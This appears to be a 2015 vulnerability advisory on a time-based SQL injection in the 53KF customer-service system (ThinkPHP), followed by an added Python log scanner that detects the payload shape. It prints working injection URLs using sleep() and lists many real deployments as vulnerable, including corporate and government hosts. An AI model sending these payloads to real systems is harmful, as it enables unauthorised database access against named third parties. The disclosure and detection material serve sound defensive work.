53KF customer-service system: generic injection (ThinkPHP case)

2015-05-19T00:00:00
ID SSV:94361
Type seebug
Reporter Root
Modified 2015-05-19T00:00:00

Description

Brief description:

ThinkPHP framework injection.

Detailed description:

WooYun: SQL injection vulnerability in the latest version of ThinkPHP. Time-delay injection: http://test2.53kf.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id[0]==-1%20or%201!=sleep(1)))limit%201%23between

Proof of vulnerability:

Many enterprises use this customer-service system:

Hundsun (恒生电子): http://webcall7.hundsun.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id[0]==-1%20or%201!=sleep(1)))limit%201%23between
BAIC Motor (北京汽车): http://kf02.baicmotorsales.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id[0]==-1%20or%201!=sleep(1)))limit%201%23between
http://csuser.jia.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1
http://cs.ub8kf.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1
http://kf2.js-l-tax.gov.cn/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1
http://lm.hzlomo.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1
http://oc2.xiaoma.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1
http://kf2.immivip.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1
http://kffz.wanlitong.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1
http://talk.kefu.ehaoyao.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1
http://talk.3861520.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1
http://kf2.haoaigou.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1
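Added detection example (not part of this advisory, and not 53KF or ThinkPHP code): it scans combined-format access-log lines for the request shape reported above, where a parameter the application expects as a single integer (company_id, assumed here) arrives with array syntax (company_id[0]) or carries SQL fragments such as sleep() or BETWEEN. The log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters the application expects as one integer (assumed for this example).
SCALAR_INT_PARAMS = {"company_id"}
# Array-style parameter name such as company_id[0]; the base name is captured.
ARRAY_NAME = re.compile(r"^([A-Za-z_]\w*)\[[^\]]*\]$")
# Fragments that never belong in an integer id: timing probes, boolean operators,
# operator keywords such as BETWEEN, and SQL comment openers.
SQL_MARKERS = re.compile(
    r"sleep\s*\(|benchmark\s*\(|\bor\b|\band\b|\bunion\b|\bbetween\b|#|--|/\*", re.I)
# Combined log format: pull the request target out of the quoted request line.
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')


def analyse_target(target):
    """Return (param, reason) findings for one request target (path + query)."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        match = ARRAY_NAME.match(name)
        base = match.group(1) if match else name
        if base not in SCALAR_INT_PARAMS:
            continue
        if match:  # company_id[0]=... reaches the query builder as an array
            findings.append((name, "array syntax on a scalar parameter"))
        if not value.lstrip("-").isdigit():
            reason = ("sql markers in integer parameter" if SQL_MARKERS.search(value)
                      else "non-numeric integer parameter")
            findings.append((name, reason))
    return findings


def scan_log(lines):
    """Return {line_number: findings} for log lines whose request looks injected."""
    hits = {}
    for number, line in enumerate(lines, start=1):
        match = REQUEST_LINE.search(line)
        findings = analyse_target(match.group(1)) if match else []
        if findings:
            hits[number] = findings
    return hits


# Constructed sample lines (not from the advisory): the first carries the payload
# shape the advisory reports, the second is a benign request with company_id=1.
SAMPLE_LOG = [
    '203.0.113.5 - - [19/May/2015:10:00:00 +0800] "GET /new/client.php?m=Statistic'
    '&a=setLost&field=chat_robot_lost&type=plus&company_id[0]==-1%20or%201!=sleep(1)))'
    'limit%201%23between HTTP/1.1" 200 12',
    '203.0.113.6 - - [19/May/2015:10:00:01 +0800] "GET /new/client.php?m=Statistic&company_id=1 HTTP/1.1" 200 12',
]
```

Running scan_log(SAMPLE_LOG) flags only the first line, with one finding for the array syntax and one for the SQL markers in the decoded value; the same check applied at request time (reject arrays, cast to int) is the corresponding mitigation.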